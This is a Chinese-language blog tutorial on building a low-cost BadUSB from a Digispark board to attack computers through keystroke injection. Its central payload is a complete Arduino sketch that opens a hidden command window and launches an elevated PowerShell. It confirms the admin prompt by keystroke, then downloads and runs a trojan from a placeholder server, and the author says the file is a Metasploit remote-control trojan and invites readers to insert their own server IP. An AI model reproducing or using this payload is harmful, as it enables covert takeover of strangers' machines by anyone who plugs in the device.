欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

【Badusb】6元钱制作Badusb教程

程序员文章站 2022-07-16 20:59:50
...

【Badusb】6元钱制作Badusb教程

在公司前一段时间了解了一些社工类产品,其中的U盘引起了我的注意,于是在网上查阅了许多资料完成制作。以下为关于Badusb的知识和制作教程:
1、概述
在2014年美国黑帽大会上,安全研究人员JakobLell和独立安全研究人员Karsten Nohl展示了他们称为“BadUSB”的攻击方法,这种攻击方法让USB安全和几乎所有和USB相关的设备(包括具有USB端口的电脑)都陷入相当危险的状态。

2、Badusb内部结构
【Badusb】6元钱制作Badusb教程

在这张图中便可以了解到Badusb和普通的U盘并没有什么两样,因此迷惑性极高,很容易攻击成功。

3、Badusb Hid攻击原理

HID是Human Interface Device的缩写,由其名称可以了解HID设备是直接与人交互的设备。一般来讲针对HID的攻击主要集中在键盘鼠标上,因为只要控制了用户键盘,基本上就等于控制了用户的电脑。攻击者会把攻击隐藏在一个正常的鼠标键盘中,当用户将含有攻击向量的鼠标或键盘,插入电脑时,恶意代码会被加载并执行。简而言之,今天要介绍的Badusb利用的是虚拟键盘来实现恶意代码的执行。

4、常见的Badusb开发板

(1)Teensy
【Badusb】6元钱制作Badusb教程

(2)Arduino Leonardo
【Badusb】6元钱制作Badusb教程
(3)Digispark
【Badusb】6元钱制作Badusb教程
综上,基本Teensy和Arduino Leonardo价格在50-200rmb之间,那么作为一个使用方法大多为撒在地上、一次性的黑客工具来说,成本是一个很大的问题,那么今天就来介绍一款只需要几块钱就能买到的BadUSB——Digispark,淘宝搜索Digispark即可。

5、环境配置

安装 Arduino 的 IDE:https://www.arduino.cc/en/Main/Software
根据自己的操作系统下载并安装。
打开Arduino应用程序,点击“文件”菜单并选择“首选项”
【Badusb】6元钱制作Badusb教程
在附加开发板管理器网址内填入并点击确定
http://digistump.com/package_digistump_index.json
【Badusb】6元钱制作Badusb教程
进入“工具”菜单,然后选择“开发板”子菜单 - 选择“开发板管理器”。
【Badusb】6元钱制作Badusb教程
然后在搜索框中搜索“Digistump AVR Boards”,然后点击安装(这里安装速度较慢,建议使用*)。
【Badusb】6元钱制作Badusb教程
(我这已经安装过了)

安装完成后,就可以在开发板中看到Digispark了。选择默认的Digispark (Default - 16.5mhz)。

【Badusb】6元钱制作Badusb教程
环境配置完成之后就可以写入payload了。

6、Payload

#include "DigiKeyboard.h"
void setup() {
  // put your setup code here, to run once:
DigiKeyboard.delay(1000);//延时1秒
DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);//按下win+r键
DigiKeyboard.delay(500);
DigiKeyboard.println("cmd");//输入"cmd"并确认
DigiKeyboard.delay(500);
DigiKeyboard.println("cmd.exe /T:01 /K mode CON: COLS=16 LINES=1");//缩小cmd窗口
DigiKeyboard.delay(300);
DigiKeyboard.println("powershell.exe -command start-process powershell -verb runAs");//以管理员身份运行powershell
DigiKeyboard.delay(2000);
DigiKeyboard.sendKeyStroke(KEY_ARROW_LEFT);//按下左箭头
DigiKeyboard.sendKeyStroke(KEY_ENTER);//按下回车
DigiKeyboard.delay(1000);
DigiKeyboard.println("$P = nEW-oBJECT sYSTEM.nET.wEBcLIENT");
DigiKeyboard.println("$P.dOWNLOADfILE('HTTP://XXX/Shell.exe','D:\\ceshi.exe')");//从服务器上下载木马到D盘
DigiKeyboard.delay(500);
DigiKeyboard.println("D:\\ceshi.exe");//启动木马
DigiKeyboard.delay(500);
DigiKeyboard.println("exit");//退出
DigiKeyboard.delay(500);
DigiKeyboard.sendKeyStroke(KEY_F4, MOD_ALT_LEFT);//按下ALT+F4

}

void loop() {
  // put your main code here, to run repeatedly:

}

之后就可以插入Digispark板点击箭头上传代码了。

总结
上述为利用kali中的msf生成的木马,从远端服务器下载并执行控制电脑的代码,将上述的XXX该为自己的服务器IP即可,具体服务器搭建和msf木马生成因时间原因就先不写了,本人也是一个小白,教程也是参考了他人,文中也可能出现错误,希望大家多多指正,不要喷。
参考文章:https://www.jianshu.com/p/77925ffae904
参考文章:https://www.77169.net/html/245762.html